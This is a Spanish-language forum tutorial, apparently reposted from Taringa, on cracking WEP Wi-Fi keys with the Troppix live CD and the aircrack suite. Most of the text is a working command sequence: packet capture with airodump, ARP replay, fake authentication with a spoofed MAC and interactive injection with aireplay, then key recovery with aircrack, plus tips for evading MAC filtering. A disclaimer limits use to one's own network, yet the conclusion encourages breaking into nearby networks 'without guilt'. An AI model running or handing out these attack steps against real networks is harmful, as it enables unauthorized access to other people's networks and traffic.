You are on page 1of 6

Sacar claves Wifi con Troppix

Posteo este SO de Linux, ya que he comprobado que para las atheros a


108mbps da resultados mejores que el propio Backtrack, (podéis hacer la
prueba)

Manual Básico Hacking WEP Troppix


1. Introducción

Por lo que he visto en el foro había alguna gente que pedía un manual básico
sobre redes Wireless en Troppix. Bien, aquí está, pero es muy muy básico.
NOTA: Este manual esta hecho para que cada persona compruebe la seguridad
de su PROPIA red Wireless, no me hago responsable de cualquier uso ilegal
que se le pueda dar a este manual.

2. Descargando, grabando y arrancando Troppix

TODO lo que necesitamos es el Troppix, no precisamos instalar ningún


programa ni driver más. En el caso de los drivers sólo en muy raras ocasiones.
Descargamos la última versión de Troppix (1.2) de
http://www.idg.pl/ftp/pobierz/linux/941.html . Atención, los que tengan
una tarjeta inhalámbrica con un chipset de intel(IPW) que hagan esto nada
más iniciar Troppix. Repito, sólo los de intel:
Código:
rmmod ipw2200
echo 100 > /sys/class/firmware/timeout
modprobe ipw2200

Grabamos la imagen con un programa que lo permita, como Nero o Alcohol


120%
Por último reiniciamos con el CD dentro de la unidad y nos aseguramos de que
el boot desde CD-ROM esté activado en la BIOS.
Pulsamos ENTER cuando cargue el Troppix, elegimos Spanish y luego nuestro
fabricante de tarjeta gráfica y su resolución.

3. Nuestro objetivo, la WEP (Wired Equivalency Privacy)

La WEP es la clave que se usa para autentificarse como cliente "legal" ante el
Punto de Acceso, y que nos deje formar parte de una red, y por lo tanto
conseguir los servicios que se les da a los usuarios de la red(como por ejemplo
Internet). Así que, manos a la obra.

4. Averiguar la WEP

Para ello hay varios procedimientos, aunque todos se realizan con la suite
aircrack ya incluida (recomiendo bajarla en español e instalarla Aircrack en
español by Uxío). Yo recomiendo usar el CCW6 de Hwagm y Uxío , para
ahorrarnos escribir demasiado, aunque en el Troppix no se puede usar, así que
voy a poner el código escrito normal.

Bien, entonces lo primero que hacemos es inicializar nuestra tarjeta. Para


saber que nombre tiene pinchamos en el símbolo de monitor que hay en la
barra y escribimos

Código:
iwconfig

Quizá nos aparecerán varias. Nuestra tarjeta es la única que al lado no pone
"No wireless extensions" Quedad con ese nombre. La mía es "ath0", y cuando
escriba la voy a poner así, cada uno que la cambie por la suya.
Inicializamos la tarjeta

Código:
airmon.sh start ath0

y ahora entramos en el airodump.

Código:
airodump ath0 pruebas 0 1

donde ath0 es la tarjeta, pruebas es el archivo donde se guardan las


capturas ,0 es el canal( al escribir 0 indicamos que busque en todos) y 1 indica
que sólo se guarden los IVs, para ahorrar espacio en disco o en memoria.

Miramos cual es el nombre de la red que queremos buscar la WEP y apuntamos


el Channel y el ESSID( nombre de la red), en este manual pongamos que es el
6 y el ESSID "Uxio".

Entonces pulsamos Control+Z y escribimos

Código:
iwconfig ath0 mode monitor channel 6 essid Uxio

Código:
airmon.sh start ath0 6

Código:
airodump ath0 pruebas 6 1

Bien, entonces así ya estaría. esperamos a que el DATA aumente y cuando


llegue a más de 250.000 abrimos otra ventana de comandos (hacemos click en
el monitor de abajo) y escribimos

Código:
aircrack pruebas*.ivs

Con un poco de suerte debería aparecer la clave aunque a veces se pueden


llegar a necesitar hasta 4 millones de IVs (DATA)
5. Acelerar el proceso cuando hay alguien conectado.

Como supongo que os daríais cuenta, los DATA suben muy lentos. Para que
suban más rápido debemos usar aireplay. Miramos los datos que aparecen en
la lista de abajo y cubrimos aquí los datos. Miramos que el BSSID coincida con
el de nuestra red. Si hay varios, nos vale cualquiera. Para escribir esto
abrimos otra ventana.

Código:
aireplay -3 ath0 -b BSSID -h STATION

6. Hacer que haya proceso o acelerarlo cuando no hay "Station" (Cliente),


es decir, nadie conectado.

A veces ni siquiera van a subir los DATA ni vamos a tener nada en la lista de
abajo que tenga que ver con nuestra red. Esto se soluciona de la siguiente
manera. Primero abrimos otra ventana y luego ponemos:

Código:
aireplay -1 30 ath0 -e ESSID -a BSSID -h 00:11:22:33:44:55

Si al final de este comando nos pone association successful lo hemos hecho


bien, pero esa ventana no la cerramos porque va a seguir enviando datos cada
30 segundos. Si nos da algún problema escribimos:

Código:
iwconfig ath0 rate 1M essid ESSID

Los problemas pueden ser debidos a:

* El AP está muy lejos


* El AP está protegido contra este ataque (no hay solución)
* Los drivers no están parcheados para la reinyección, pero si estáis usando
Troppix no os preocupeis por esto porque ya vienen instalados por defecto
* Filtrado MAC. Nos pondrá algo así "AP rejects MAC". Para solucionarlo
tendremos que coneguir la MAC de un cliente, así que mejor dejamos que se
conecte y hacemos el paso 5 directamente.

y luego lo de antes.

Código:
aireplay -1 30 ath0 -e ESSID -a BSSID -h 00:11:22:33:44:55

Bien, después de association succesful abrimos una nueva ventana de


comandos y escribimos

Código:
aireplay -3 ath0 -b BSSID -h 00:11:22:33:44:55 -x 300
Si sale bien veremos que cuando lleve cierto número de READ empezarán a
aumentar ARP y SENT. Además en el airodump veremos que los DATA
empiezan a subir.

Después de todo esto tenemos que ejecutar el aircrack como ya dije antes
para averiguar la clave.

Como curiosidad (y salvación para algunos), las redes que son del estilo "PACO
27", sin barra (_), en aireplay quedarían así

Código:
-e PACO 27.

Pequeño resumen (con atheros)

airodump ath0 pruebas 6 1


(La red estaria en el canal 6)

aireplay -3 ath0 -b BSSID -h STATION


(ataque con cliente conectado)

aireplay -1 30 ath0 -e ESSID -a BSSID -h 00:11:22:33:44:55


aireplay -3 ath0 -b BSSID -h 00:11:22:33:44:55 -x 300
(ataque sin cliente)

Tambien podeis probar este ataque muy efectivo


aireplay -2 -p 0841 -c F F : F F : F F : F F : F F : F F -b BSSID -h
00:11:22:33:44:55 ath0
FF, va junto. Sin espacios.. (F F : ) igual los :. Lo posteo asi ya que en taringa
se interpreta como un emoticono... quedaria asi, FF F

aircrack pruebas*.ivs
(Descifrar clave atraves de los ivs almacenados con airdump)
Tambien, podéis abrir con la aplicacion nautilus, un txt con esta informacion
para poder copiar y pegar con una cosola que lo permita como gnome.
Como muchos sabréis, Control + C en linux sirve para parar el proceso de la
consola asique cuidado, aunque también esto es util. Copiad y pegad a ratón.

Si os interesa este live mirad este tutorial para instalarlo en el disco duro
http://hwagm.elhacker.net/htm/livdcd-hdd.htm

7. Conclusiones.

Bueno, creo que con todo esto lo más importante ya está. Esto nos muestra lo
inseguras que son la redes basadas en claves WEP, y que simplemente con un
Live-CD sin tener experiencia en Linux se pueden romper.

Una vez que tengais varias redes a vuestro alcance desprotegidas es


interesante que os mireis también este post:
Hacking Wireless sin cargos de conciencia
Cualquier comentario o duda, mandadme un mensaje personal o colocadlas en
este post.

Links:

http://rapidshare.com/files/405755212/troppix--i586-1.2.part1.rar.html
http://rapidshare.com/files/405785365/troppix--i586-1.2.part2.rar.html

You might also like